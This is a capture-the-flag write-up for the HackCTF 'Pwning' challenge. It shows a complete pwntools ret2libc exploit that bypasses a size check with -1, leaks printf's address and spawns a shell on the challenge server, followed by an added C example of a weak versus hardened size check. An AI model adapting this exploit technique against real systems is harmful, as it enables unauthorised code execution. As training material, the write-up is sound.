[HackCTF : Pwnable] Pwning (300p)
Wargame/HackCTF 2021. 12. 27. 16:37
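The program reads as many bytes as the number you enter.
Looking at main and vuln: if the number is 33 or more, it prints No! That size (%d) is too large! and exits, but this check can be bypassed by entering -1.
After that, it is just ROP.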
```python
from pwn import *

# p = process("./pwning")
p = remote("ctf.j0n9hyun.xyz", 3019)
e = ELF("./pwning")

prt_plt = e.plt['printf']
prt_got = e.got['printf']
vuln = e.symbols['vuln']

# Stage 1: print the resolved address of printf from its GOT entry,
# then return to vuln for a second input.
payload = b"A" * 48
payload += p32(prt_plt)
payload += p32(vuln)
payload += p32(prt_got)

p.sendline(b"-1")  # size value that passes the "too large" check
p.sendline(payload)

p.recvuntil(payload)
p.recv(1)
printf_addr = u32(p.recv(4))
log.info(hex(printf_addr))

# libc offsets for the remote libc, as used in this write-up
libc_base = printf_addr - 0x049020
system = libc_base + 0x03a940
str_bin_sh = libc_base + 0x15902b

# Stage 2: system("/bin/sh")
payload = b"A" * 48
payload += p32(system)
payload += b"AAAA"
payload += p32(str_bin_sh)

p.sendline(b"-1")
p.sendline(payload)

p.interactive()
```
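The size check described above, as an added example (not code from the challenge binary or from the original post): a C sketch of a signed, upper-bound-only check next to a hardened version. The names weak_check, strict_check and BUF_SIZE, and the assumption that the accepted value is later used as an unsigned length, are illustrative; the page does not show the binary's source.

```c
#include <errno.h>
#include <limits.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define BUF_SIZE 32 /* from the write-up: 33 or more is rejected */

/* Weak form (assumed shape): signed compare with an upper bound only.
 * The accepted value is then used as an unsigned length (assumption). */
int weak_check(int n, size_t *len)
{
    if (n > BUF_SIZE)
        return -1;                   /* "That size is too large" path */
    *len = (size_t)(unsigned int)n;  /* -1 becomes UINT_MAX here */
    return 0;
}

/* Hardened form: parse strictly, reject negatives, bound both sides. */
int strict_check(const char *text, size_t *len)
{
    char *end;
    long v;

    errno = 0;
    v = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE)
        return -1;                   /* not a clean decimal number */
    if (v < 0 || v > BUF_SIZE)
        return -1;                   /* outside 0..BUF_SIZE */
    *len = (size_t)v;
    return 0;
}

int main(void)
{
    const char *inputs[] = { "16", "33", "-1" }; /* constructed samples */
    size_t len;

    for (size_t i = 0; i < 3; i++) {
        int w = weak_check(atoi(inputs[i]), &len);
        printf("%-3s weak: %s", inputs[i], w ? "rejected" : "accepted");
        if (w == 0)
            printf(" (length %zu)", len);
        printf(", strict: %s\n",
               strict_check(inputs[i], &len) ? "rejected" : "accepted");
    }
    return 0;
}
```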